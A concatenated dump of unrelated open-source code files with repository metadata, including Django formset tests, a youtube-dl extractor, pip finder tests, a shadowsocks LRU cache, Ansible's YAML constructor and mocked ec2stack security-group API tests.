formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertEqual(formset.total_error_count(), 1)
data['choices-1-votes'] = ''
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertEqual(formset.total_error_count(), 2)
data = {
'choices-TOTAL_FORMS': '1', # the number of forms rendered
'choices-INITIAL_FORMS': '0', # the number of forms with initial data
'choices-MAX_NUM_FORMS': '0', # max number of forms
'choices-0-choice': 'Calexico',
'choices-0-votes': '100',
}
class Choice(Form):
choice = CharField()
votes = IntegerField()
ChoiceFormSet = formset_factory(Choice)
class FormsetAsFooTests(TestCase):
def test_as_table(self):
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertHTMLEqual(formset.as_table(),"""<input type="hidden" name="choices-TOTAL_FORMS" value="1" /><input type="hidden" name="choices-INITIAL_FORMS" value="0" /><input type="hidden" name="choices-MAX_NUM_FORMS" value="0" />
<tr><th>Choice:</th><td><input type="text" name="choices-0-choice" value="Calexico" /></td></tr>
<tr><th>Votes:</th><td><input type="number" name="choices-0-votes" value="100" /></td></tr>""")
def test_as_p(self):
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertHTMLEqual(formset.as_p(),"""<input type="hidden" name="choices-TOTAL_FORMS" value="1" /><input type="hidden" name="choices-INITIAL_FORMS" value="0" /><input type="hidden" name="choices-MAX_NUM_FORMS" value="0" />
<p>Choice: <input type="text" name="choices-0-choice" value="Calexico" /></p>
<p>Votes: <input type="number" name="choices-0-votes" value="100" /></p>""")
def test_as_ul(self):
formset = ChoiceFormSet(data, auto_id=False, prefix='choices')
self.assertHTMLEqual(formset.as_ul(),"""<input type="hidden" name="choices-TOTAL_FORMS" value="1" /><input type="hidden" name="choices-INITIAL_FORMS" value="0" /><input type="hidden" name="choices-MAX_NUM_FORMS" value="0" />
<li>Choice: <input type="text" name="choices-0-choice" value="Calexico" /></li>
<li>Votes: <input type="number" name="choices-0-votes" value="100" /></li>""")
# Regression test for #11418 #################################################
class ArticleForm(Form):
title = CharField()
pub_date = DateField()
ArticleFormSet = formset_factory(ArticleForm)
class TestIsBoundBehavior(TestCase):
def test_no_data_raises_validation_error(self):
with self.assertRaises(ValidationError):
ArticleFormSet({}).is_valid()
def test_with_management_data_attrs_work_fine(self):
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
}
formset = ArticleFormSet(data)
self.assertEqual(0, formset.initial_form_count())
self.assertEqual(1, formset.total_form_count())
self.assertTrue(formset.is_bound)
self.assertTrue(formset.forms[0].is_bound)
self.assertTrue(formset.is_valid())
self.assertTrue(formset.forms[0].is_valid())
self.assertEqual([{}], formset.cleaned_data)
def test_form_errors_are_caught_by_formset(self):
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-0-title': 'Test',
'form-0-pub_date': '1904-06-16',
'form-1-title': 'Test',
'form-1-pub_date': '', # <-- this date is missing but required
}
formset = ArticleFormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual([{}, {'pub_date': ['This field is required.']}], formset.errors)
def test_empty_forms_are_unbound(self):
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-0-title': 'Test',
'form-0-pub_date': '1904-06-16',
}
unbound_formset = ArticleFormSet()
bound_formset = ArticleFormSet(data)
empty_forms = []
empty_forms.append(unbound_formset.empty_form)
empty_forms.append(bound_formset.empty_form)
# Empty forms should be unbound
self.assertFalse(empty_forms[0].is_bound)
self.assertFalse(empty_forms[1].is_bound)
# The empty forms should be equal.
self.assertHTMLEqual(empty_forms[0].as_p(), empty_forms[1].as_p())
class TestEmptyFormSet(TestCase):
def test_empty_formset_is_valid(self):
"""Test that an empty formset still calls clean()"""
EmptyFsetWontValidateFormset = formset_factory(FavoriteDrinkForm, extra=0, formset=EmptyFsetWontValidate)
formset = EmptyFsetWontValidateFormset(data={'form-INITIAL_FORMS':'0', 'form-TOTAL_FORMS':'0'},prefix="form")
formset2 = EmptyFsetWontValidateFormset(data={'form-INITIAL_FORMS':'0', 'form-TOTAL_FORMS':'1', 'form-0-name':'bah' },prefix="form")
self.assertFalse(formset.is_valid())
self.assertFalse(formset2.is_valid())
def test_empty_formset_media(self):
"""Make sure media is available on empty formset, refs #19545"""
class MediaForm(Form):
class Media:
js = ('some-file.js',)
self.assertIn('some-file.js', str(formset_factory(MediaForm, extra=0)().media))
def test_empty_formset_is_multipart(self):
"""Make sure `is_multipart()` works with empty formset, refs #19545"""
class FileForm(Form):
file = FileField()
self.assertTrue(formset_factory(FileForm, extra=0)().is_multipart())
| gpl-3.0 |
steebchen/youtube-dl | youtube_dl/extractor/morningstar.py | 33 | 1862 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
class MorningstarIE(InfoExtractor):
IE_DESC = 'morningstar.com'
_VALID_URL = r'https?://(?:(?:www|news)\.)morningstar\.com/[cC]over/video[cC]enter\.aspx\?id=(?P<id>[0-9]+)'
_TESTS = [{
'url': 'http://www.morningstar.com/cover/videocenter.aspx?id=615869',
'md5': '6c0acface7a787aadc8391e4bbf7b0f5',
'info_dict': {
'id': '615869',
'ext': 'mp4',
'title': 'Get Ahead of the Curve on 2013 Taxes',
'description': "Vanguard's Joel Dickson on managing higher tax rates for high-income earners and fund capital-gain distributions in 2013.",
'thumbnail': r're:^https?://.*m(?:orning)?star\.com/.+thumb\.jpg$'
}
}, {
'url': 'http://news.morningstar.com/cover/videocenter.aspx?id=825556',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
webpage = self._download_webpage(url, video_id)
title = self._html_search_regex(
r'<h1 id="titleLink">(.*?)</h1>', webpage, 'title')
video_url = self._html_search_regex(
r'<input type="hidden" id="hidVideoUrl" value="([^"]+)"',
webpage, 'video URL')
thumbnail = self._html_search_regex(
r'<input type="hidden" id="hidSnapshot" value="([^"]+)"',
webpage, 'thumbnail', fatal=False)
description = self._html_search_regex(
r'<div id="mstarDeck".*?>(.*?)</div>',
webpage, 'description', fatal=False)
return {
'id': video_id,
'title': title,
'url': video_url,
'thumbnail': thumbnail,
'description': description,
}
| unlicense |
gangadhar-kadam/latestchurcherp | erpnext/shopping_cart/product.py | 16 | 1688 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cint, fmt_money, cstr
from erpnext.shopping_cart.cart import _get_cart_quotation
from urllib import unquote
@frappe.whitelist(allow_guest=True)
def get_product_info(item_code):
"""get product price / stock info"""
if not cint(frappe.db.get_default("shopping_cart_enabled")):
return {}
cart_quotation = _get_cart_quotation()
price_list = cstr(unquote(frappe.local.request.cookies.get("selling_price_list")))
warehouse = frappe.db.get_value("Item", item_code, "website_warehouse")
if warehouse:
in_stock = frappe.db.sql("""select actual_qty from tabBin where
item_code=%s and warehouse=%s""", (item_code, warehouse))
if in_stock:
in_stock = in_stock[0][0] > 0 and 1 or 0
else:
in_stock = -1
price = price_list and frappe.db.sql("""select price_list_rate, currency from
`tabItem Price` where item_code=%s and price_list=%s""",
(item_code, price_list), as_dict=1) or []
price = price and price[0] or None
qty = 0
if price:
price["formatted_price"] = fmt_money(price["price_list_rate"], currency=price["currency"])
price["currency"] = not cint(frappe.db.get_default("hide_currency_symbol")) \
and (frappe.db.get_value("Currency", price.currency, "symbol") or price.currency) \
or ""
if frappe.session.user != "Guest":
item = cart_quotation.get({"item_code": item_code})
if item:
qty = item[0].qty
return {
"price": price,
"stock": in_stock,
"uom": frappe.db.get_value("Item", item_code, "stock_uom"),
"qty": qty
}
| agpl-3.0 |
ajjl/ITK | Examples/IO/DicomSliceRead.py | 23 | 1679 | #==========================================================================
#
# Copyright Insight Software Consortium
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#==========================================================================*/
#
# Example on the use of ImageFileReader to reading a single slice (it will read
# DICOM or other format), rescale the intensities and save it in a different
# file format.
#
import itk
import sys
if len(sys.argv) < 3:
print('Usage: ' + sys.argv[0] + ' inputFile.dcm outputFile.png')
sys.exit(1)
#
# Reads a 2D image in with signed short (16bits/pixel) pixel type
# and save it as unsigned char (8bits/pixel) pixel type
#
InputImageType = itk.Image.SS2
OutputImageType = itk.Image.UC2
reader = itk.ImageFileReader[InputImageType].New()
writer = itk.ImageFileWriter[OutputImageType].New()
filter = itk.RescaleIntensityImageFilter[InputImageType, OutputImageType].New()
filter.SetOutputMinimum( 0 )
filter.SetOutputMaximum(255)
filter.SetInput( reader.GetOutput() )
writer.SetInput( filter.GetOutput() )
reader.SetFileName( sys.argv[1] )
writer.SetFileName( sys.argv[2] )
writer.Update()
| apache-2.0 |
plotly/plotly.py | packages/python/plotly/plotly/validators/heatmapgl/colorbar/__init__.py | 36 | 4403 | import sys
if sys.version_info < (3, 7):
from ._ypad import YpadValidator
from ._yanchor import YanchorValidator
from ._y import YValidator
from ._xpad import XpadValidator
from ._xanchor import XanchorValidator
from ._x import XValidator
from ._title import TitleValidator
from ._tickwidth import TickwidthValidator
from ._tickvalssrc import TickvalssrcValidator
from ._tickvals import TickvalsValidator
from ._ticktextsrc import TicktextsrcValidator
from ._ticktext import TicktextValidator
from ._ticksuffix import TicksuffixValidator
from ._ticks import TicksValidator
from ._tickprefix import TickprefixValidator
from ._tickmode import TickmodeValidator
from ._ticklen import TicklenValidator
from ._ticklabelposition import TicklabelpositionValidator
from ._ticklabeloverflow import TicklabeloverflowValidator
from ._tickformatstopdefaults import TickformatstopdefaultsValidator
from ._tickformatstops import TickformatstopsValidator
from ._tickformat import TickformatValidator
from ._tickfont import TickfontValidator
from ._tickcolor import TickcolorValidator
from ._tickangle import TickangleValidator
from ._tick0 import Tick0Validator
from ._thicknessmode import ThicknessmodeValidator
from ._thickness import ThicknessValidator
from ._showticksuffix import ShowticksuffixValidator
from ._showtickprefix import ShowtickprefixValidator
from ._showticklabels import ShowticklabelsValidator
from ._showexponent import ShowexponentValidator
from ._separatethousands import SeparatethousandsValidator
from ._outlinewidth import OutlinewidthValidator
from ._outlinecolor import OutlinecolorValidator
from ._nticks import NticksValidator
from ._minexponent import MinexponentValidator
from ._lenmode import LenmodeValidator
from ._len import LenValidator
from ._exponentformat import ExponentformatValidator
from ._dtick import DtickValidator
from ._borderwidth import BorderwidthValidator
from ._bordercolor import BordercolorValidator
from ._bgcolor import BgcolorValidator
else:
from _plotly_utils.importers import relative_import
__all__, __getattr__, __dir__ = relative_import(
__name__,
[],
[
"._ypad.YpadValidator",
"._yanchor.YanchorValidator",
"._y.YValidator",
"._xpad.XpadValidator",
"._xanchor.XanchorValidator",
"._x.XValidator",
"._title.TitleValidator",
"._tickwidth.TickwidthValidator",
"._tickvalssrc.TickvalssrcValidator",
"._tickvals.TickvalsValidator",
"._ticktextsrc.TicktextsrcValidator",
"._ticktext.TicktextValidator",
"._ticksuffix.TicksuffixValidator",
"._ticks.TicksValidator",
"._tickprefix.TickprefixValidator",
"._tickmode.TickmodeValidator",
"._ticklen.TicklenValidator",
"._ticklabelposition.TicklabelpositionValidator",
"._ticklabeloverflow.TicklabeloverflowValidator",
"._tickformatstopdefaults.TickformatstopdefaultsValidator",
"._tickformatstops.TickformatstopsValidator",
"._tickformat.TickformatValidator",
"._tickfont.TickfontValidator",
"._tickcolor.TickcolorValidator",
"._tickangle.TickangleValidator",
"._tick0.Tick0Validator",
"._thicknessmode.ThicknessmodeValidator",
"._thickness.ThicknessValidator",
"._showticksuffix.ShowticksuffixValidator",
"._showtickprefix.ShowtickprefixValidator",
"._showticklabels.ShowticklabelsValidator",
"._showexponent.ShowexponentValidator",
"._separatethousands.SeparatethousandsValidator",
"._outlinewidth.OutlinewidthValidator",
"._outlinecolor.OutlinecolorValidator",
"._nticks.NticksValidator",
"._minexponent.MinexponentValidator",
"._lenmode.LenmodeValidator",
"._len.LenValidator",
"._exponentformat.ExponentformatValidator",
"._dtick.DtickValidator",
"._borderwidth.BorderwidthValidator",
"._bordercolor.BordercolorValidator",
"._bgcolor.BgcolorValidator",
],
)
| mit |
alexis-roche/nipy | nipy/modalities/fmri/tests/test_fmri.py | 3 | 2172 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
from __future__ import with_statement
from __future__ import absolute_import
import gc
import warnings
import numpy as np
from nipy.modalities.fmri.api import axis0_generator, FmriImageList
from nipy.core.api import parcels, Image, AffineTransform as AfT
from nipy.io.api import load_image, save_image
from nose.tools import assert_equal, assert_true
from nibabel.tmpdirs import InTemporaryDirectory
from nipy.testing import funcfile
def setup():
# Suppress warnings during tests to reduce noise
warnings.simplefilter("ignore")
def teardown():
# Clear list of warning filters
warnings.resetwarnings()
def test_write():
fname = 'myfile.nii'
img = load_image(funcfile)
with InTemporaryDirectory():
save_image(img, fname)
test = FmriImageList.from_image(load_image(fname))
assert_equal(test[0].affine.shape, (4,4))
assert_equal(img[0].affine.shape, (5,4))
# Check the affine...
A = np.identity(4)
A[:3,:3] = img[:,:,:,0].affine[:3,:3]
A[:3,-1] = img[:,:,:,0].affine[:3,-1]
assert_true(np.allclose(test[0].affine, A))
del test
def test_iter():
img = load_image(funcfile)
img_shape = img.shape
exp_shape = (img_shape[0],) + img_shape[2:]
j = 0
for i, d in axis0_generator(img.get_data()):
j += 1
assert_equal(d.shape, exp_shape)
del(i); gc.collect()
assert_equal(j, img_shape[1])
def test_subcoordmap():
img = load_image(funcfile)
subcoordmap = img[3].coordmap
xform = img.affine[:,1:]
assert_true(np.allclose(subcoordmap.affine[1:], xform[1:]))
assert_true(np.allclose(subcoordmap.affine[0], [0,0,0,img.coordmap([3,0,0,0])[0]]))
def test_labels1():
img = load_image(funcfile)
data = img.get_data()
parcelmap = Image(img[0].get_data(), AfT('kji', 'zyx', np.eye(4)))
parcelmap = (parcelmap.get_data() * 100).astype(np.int32)
v = 0
for i, d in axis0_generator(data, parcels(parcelmap)):
v += d.shape[1]
assert_equal(v, parcelmap.size)
| bsd-3-clause |
ericholscher/pip-1 | tests/test_finder.py | 1 | 4262 | from pkg_resources import parse_version
from pip.backwardcompat import urllib
from pip.req import InstallRequirement
from pip.index import PackageFinder
from pip.exceptions import BestVersionAlreadyInstalled
from tests.path import Path
from tests.test_pip import here
from nose.tools import assert_raises
from mock import Mock
find_links = 'file://' + urllib.quote(str(Path(here).abspath/'packages').replace('\\', '/'))
find_links2 = 'file://' + urllib.quote(str(Path(here).abspath/'packages2').replace('\\', '/'))
def test_no_mpkg():
"""Finder skips zipfiles with "macosx10" in the name."""
finder = PackageFinder([find_links], [])
req = InstallRequirement.from_line("pkgwithmpkg")
found = finder.find_requirement(req, False)
assert found.url.endswith("pkgwithmpkg-1.0.tar.gz"), found
def test_no_partial_name_match():
"""Finder requires the full project name to match, not just beginning."""
finder = PackageFinder([find_links], [])
req = InstallRequirement.from_line("gmpy")
found = finder.find_requirement(req, False)
assert found.url.endswith("gmpy-1.15.tar.gz"), found
def test_duplicates_sort_ok():
"""Finder successfully finds one of a set of duplicates in different
locations"""
finder = PackageFinder([find_links, find_links2], [])
req = InstallRequirement.from_line("duplicate")
found = finder.find_requirement(req, False)
assert found.url.endswith("duplicate-1.0.tar.gz"), found
def test_finder_detects_latest_find_links():
"""Test PackageFinder detects latest using find-links"""
req = InstallRequirement.from_line('simple', None)
finder = PackageFinder([find_links], [])
link = finder.find_requirement(req, False)
assert link.url.endswith("simple-3.0.tar.gz")
def test_finder_detects_latest_already_satisfied_find_links():
"""Test PackageFinder detects latest already satisified using find-links"""
req = InstallRequirement.from_line('simple', None)
#the latest simple in local pkgs is 3.0
latest_version = "3.0"
satisfied_by = Mock(
location = "/path",
parsed_version = parse_version(latest_version),
version = latest_version
)
req.satisfied_by = satisfied_by
finder = PackageFinder([find_links], [])
assert_raises(BestVersionAlreadyInstalled, finder.find_requirement, req, True)
def test_finder_detects_latest_already_satisfied_pypi_links():
"""Test PackageFinder detects latest already satisified using pypi links"""
req = InstallRequirement.from_line('initools', None)
#the latest initools on pypi is 0.3.1
latest_version = "0.3.1"
satisfied_by = Mock(
location = "/path",
parsed_version = parse_version(latest_version),
version = latest_version
)
req.satisfied_by = satisfied_by
finder = PackageFinder([], ["http://pypi.python.org/simple"])
assert_raises(BestVersionAlreadyInstalled, finder.find_requirement, req, True)
def test_finder_priority_file_over_page():
"""Test PackageFinder prefers file links over equivalent page links"""
req = InstallRequirement.from_line('gmpy==1.15', None)
finder = PackageFinder([find_links], ["http://pypi.python.org/simple"])
link = finder.find_requirement(req, False)
assert link.url.startswith("file://")
def test_finder_priority_page_over_deplink():
"""Test PackageFinder prefers page links over equivalent dependency links"""
req = InstallRequirement.from_line('gmpy==1.15', None)
finder = PackageFinder([], ["http://pypi.python.org/simple"])
finder.add_dependency_links(['http://c.pypi.python.org/simple/gmpy/'])
link = finder.find_requirement(req, False)
assert link.url.startswith("http://pypi")
def test_finder_priority_nonegg_over_eggfragments():
"""Test PackageFinder prefers non-egg links over "#egg=" links"""
req = InstallRequirement.from_line('bar==1.0', None)
links = ['http://foo/bar.py#egg=bar-1.0', 'http://foo/bar-1.0.tar.gz']
finder = PackageFinder(links, [])
link = finder.find_requirement(req, False)
assert link.url.endswith('tar.gz')
links.reverse()
finder = PackageFinder(links, [])
link = finder.find_requirement(req, False)
assert link.url.endswith('tar.gz')
| mit |
hzy87email/shadowsocks | shadowsocks/lru_cache.py | 983 | 4290 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import collections
import logging
import time
# this LRUCache is optimized for concurrency, not QPS
# n: concurrency, keys stored in the cache
# m: visits not timed out, proportional to QPS * timeout
# get & set is O(1), not O(n). thus we can support very large n
# TODO: if timeout or QPS is too large, then this cache is not very efficient,
# as sweep() causes long pause
class LRUCache(collections.MutableMapping):
"""This class is not thread safe"""
def __init__(self, timeout=60, close_callback=None, *args, **kwargs):
self.timeout = timeout
self.close_callback = close_callback
self._store = {}
self._time_to_keys = collections.defaultdict(list)
self._keys_to_last_time = {}
self._last_visits = collections.deque()
self._closed_values = set()
self.update(dict(*args, **kwargs)) # use the free update to set keys
def __getitem__(self, key):
# O(1)
t = time.time()
self._keys_to_last_time[key] = t
self._time_to_keys[t].append(key)
self._last_visits.append(t)
return self._store[key]
def __setitem__(self, key, value):
# O(1)
t = time.time()
self._keys_to_last_time[key] = t
self._store[key] = value
self._time_to_keys[t].append(key)
self._last_visits.append(t)
def __delitem__(self, key):
# O(1)
del self._store[key]
del self._keys_to_last_time[key]
def __iter__(self):
return iter(self._store)
def __len__(self):
return len(self._store)
def sweep(self):
# O(m)
now = time.time()
c = 0
while len(self._last_visits) > 0:
least = self._last_visits[0]
if now - least <= self.timeout:
break
if self.close_callback is not None:
for key in self._time_to_keys[least]:
if key in self._store:
if now - self._keys_to_last_time[key] > self.timeout:
value = self._store[key]
if value not in self._closed_values:
self.close_callback(value)
self._closed_values.add(value)
for key in self._time_to_keys[least]:
self._last_visits.popleft()
if key in self._store:
if now - self._keys_to_last_time[key] > self.timeout:
del self._store[key]
del self._keys_to_last_time[key]
c += 1
del self._time_to_keys[least]
if c:
self._closed_values.clear()
logging.debug('%d keys swept' % c)
def test():
c = LRUCache(timeout=0.3)
c['a'] = 1
assert c['a'] == 1
time.sleep(0.5)
c.sweep()
assert 'a' not in c
c['a'] = 2
c['b'] = 3
time.sleep(0.2)
c.sweep()
assert c['a'] == 2
assert c['b'] == 3
time.sleep(0.2)
c.sweep()
c['b']
time.sleep(0.2)
c.sweep()
assert 'a' not in c
assert c['b'] == 3
time.sleep(0.5)
c.sweep()
assert 'a' not in c
assert 'b' not in c
global close_cb_called
close_cb_called = False
def close_cb(t):
global close_cb_called
assert not close_cb_called
close_cb_called = True
c = LRUCache(timeout=0.1, close_callback=close_cb)
c['s'] = 1
c['s']
time.sleep(0.1)
c['s']
time.sleep(0.3)
c.sweep()
if __name__ == '__main__':
test()
| apache-2.0 |
shanemcd/ansible | lib/ansible/parsing/yaml/constructor.py | 96 | 6286 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from yaml.constructor import SafeConstructor, ConstructorError
from yaml.nodes import MappingNode
from ansible.module_utils._text import to_bytes
from ansible.parsing.yaml.objects import AnsibleMapping, AnsibleSequence, AnsibleUnicode
from ansible.parsing.yaml.objects import AnsibleVaultEncryptedUnicode
from ansible.utils.unsafe_proxy import wrap_var
from ansible.parsing.vault import VaultLib
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class AnsibleConstructor(SafeConstructor):
def __init__(self, file_name=None, vault_secrets=None):
self._ansible_file_name = file_name
super(AnsibleConstructor, self).__init__()
self._vaults = {}
self.vault_secrets = vault_secrets or []
self._vaults['default'] = VaultLib(secrets=self.vault_secrets)
def construct_yaml_map(self, node):
data = AnsibleMapping()
yield data
value = self.construct_mapping(node)
data.update(value)
data.ansible_pos = self._node_position_info(node)
def construct_mapping(self, node, deep=False):
# Most of this is from yaml.constructor.SafeConstructor. We replicate
# it here so that we can warn users when they have duplicate dict keys
# (pyyaml silently allows overwriting keys)
if not isinstance(node, MappingNode):
raise ConstructorError(None, None,
"expected a mapping node, but found %s" % node.id,
node.start_mark)
self.flatten_mapping(node)
mapping = AnsibleMapping()
# Add our extra information to the returned value
mapping.ansible_pos = self._node_position_info(node)
for key_node, value_node in node.value:
key = self.construct_object(key_node, deep=deep)
try:
hash(key)
except TypeError as exc:
raise ConstructorError("while constructing a mapping", node.start_mark,
"found unacceptable key (%s)" % exc, key_node.start_mark)
if key in mapping:
display.warning(u'While constructing a mapping from {1}, line {2}, column {3}, found a duplicate dict key ({0}).'
u' Using last defined value only.'.format(key, *mapping.ansible_pos))
value = self.construct_object(value_node, deep=deep)
mapping[key] = value
return mapping
def construct_yaml_str(self, node, unsafe=False):
# Override the default string handling function
# to always return unicode objects
value = self.construct_scalar(node)
ret = AnsibleUnicode(value)
ret.ansible_pos = self._node_position_info(node)
if unsafe:
ret = wrap_var(ret)
return ret
def construct_vault_encrypted_unicode(self, node):
value = self.construct_scalar(node)
b_ciphertext_data = to_bytes(value)
# could pass in a key id here to choose the vault to associate with
# TODO/FIXME: plugin vault selector
vault = self._vaults['default']
if vault.secrets is None:
raise ConstructorError(context=None, context_mark=None,
problem="found !vault but no vault password provided",
problem_mark=node.start_mark,
note=None)
ret = AnsibleVaultEncryptedUnicode(b_ciphertext_data)
ret.vault = vault
return ret
def construct_yaml_seq(self, node):
data = AnsibleSequence()
yield data
data.extend(self.construct_sequence(node))
data.ansible_pos = self._node_position_info(node)
def construct_yaml_unsafe(self, node):
return self.construct_yaml_str(node, unsafe=True)
def _node_position_info(self, node):
# the line number where the previous token has ended (plus empty lines)
# Add one so that the first line is line 1 rather than line 0
column = node.start_mark.column + 1
line = node.start_mark.line + 1
# in some cases, we may have pre-read the data and then
# passed it to the load() call for YAML, in which case we
# want to override the default datasource (which would be
# '<string>') to the actual filename we read in
datasource = self._ansible_file_name or node.start_mark.name
return (datasource, line, column)
AnsibleConstructor.add_constructor(
u'tag:yaml.org,2002:map',
AnsibleConstructor.construct_yaml_map)
AnsibleConstructor.add_constructor(
u'tag:yaml.org,2002:python/dict',
AnsibleConstructor.construct_yaml_map)
AnsibleConstructor.add_constructor(
u'tag:yaml.org,2002:str',
AnsibleConstructor.construct_yaml_str)
AnsibleConstructor.add_constructor(
u'tag:yaml.org,2002:python/unicode',
AnsibleConstructor.construct_yaml_str)
AnsibleConstructor.add_constructor(
u'tag:yaml.org,2002:seq',
AnsibleConstructor.construct_yaml_seq)
AnsibleConstructor.add_constructor(
u'!unsafe',
AnsibleConstructor.construct_yaml_unsafe)
AnsibleConstructor.add_constructor(
u'!vault',
AnsibleConstructor.construct_vault_encrypted_unicode)
AnsibleConstructor.add_constructor(u'!vault-encrypted', AnsibleConstructor.construct_vault_encrypted_unicode)
| gpl-3.0 |
apache/cloudstack-ec2stack | tests/security_group_tests.py | 3 | 18822 | #!/usr/bin/env python
# encoding: utf-8
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import json
import mock
from ec2stack.helpers import read_file, generate_signature
from . import Ec2StackAppTestCase
class SecurityGroupTestCase(Ec2StackAppTestCase):
def test_authorize_security_group_ingress_by_name(self):
data = self.get_example_data()
data['Action'] = 'AuthorizeSecurityGroupIngress'
data['GroupName'] = 'test'
data['FromPort'] = '1000'
data['ToPort'] = '1024'
data['IpProtocol'] = 'tcp'
data['CidrIp'] = '0.0.0.0/0'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/valid_authorize_security_group_ingress.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_ok(response)
assert 'AuthorizeSecurityGroupIngressResponse' in response.data
def test_authorize_security_group_ingress_by_id(self):
data = self.get_example_data()
data['Action'] = 'AuthorizeSecurityGroupIngress'
data['GroupId'] = '7ae5b92f-3a0d-4977-bc33-f1aaecee5776'
data['FromPort'] = '-1'
data['ToPort'] = '-1'
data['IpProtocol'] = 'icmp'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/valid_authorize_security_group_ingress.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_ok(response)
assert 'AuthorizeSecurityGroupIngressResponse' in response.data
def test_authorize_security_group_egress_by_name(self):
data = self.get_example_data()
data['Action'] = 'AuthorizeSecurityGroupEgress'
data['GroupName'] = 'test'
data['FromPort'] = '1000'
data['ToPort'] = '1024'
data['IpProtocol'] = 'tcp'
data['CidrIp'] = '0.0.0.0/0'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/valid_authorize_security_group_egress.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_ok(response)
assert 'AuthorizeSecurityGroupEgressResponse' in response.data
def test_authorize_security_group_egress_by_id(self):
data = self.get_example_data()
data['Action'] = 'AuthorizeSecurityGroupEgress'
data['GroupId'] = '7ae5b92f-3a0d-4977-bc33-f1aaecee5776'
data['FromPort'] = '-1'
data['ToPort'] = '-1'
data['IpProtocol'] = 'icmp'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/valid_authorize_security_group_egress.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_ok(response)
assert 'AuthorizeSecurityGroupEgressResponse' in response.data
def test_duplicate_authorize_security_group(self):
data = self.get_example_data()
data['Action'] = 'AuthorizeSecurityGroupEgress'
data['GroupName'] = 'test'
data['FromPort'] = '1000'
data['ToPort'] = '1024'
data['IpProtocol'] = 'tcp'
data['CidrIp'] = '0.0.0.0/0'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/invalid_authorize_security_group_egress_duplicate.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_bad_request(response)
assert 'InvalidPermission.Duplicate' in response.data
def test_invalid_rule_authorize_security_group(self):
data = self.get_example_data()
data['Action'] = 'AuthorizeSecurityGroupEgress'
data['GroupName'] = 'test'
data['FromPort'] = '1000'
data['ToPort'] = '99999'
data['IpProtocol'] = 'tcp'
data['CidrIp'] = '0.0.0.0/24'
data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
get = mock.Mock()
get.return_value.text = read_file(
'tests/data/invalid_authorize_security_group_egress.json'
)
get.return_value.status_code = 200
with mock.patch('requests.get', get):
response = self.post(
'/',
data=data
)
self.assert_bad_request(response)
assert 'InvalidRequest' in response.data
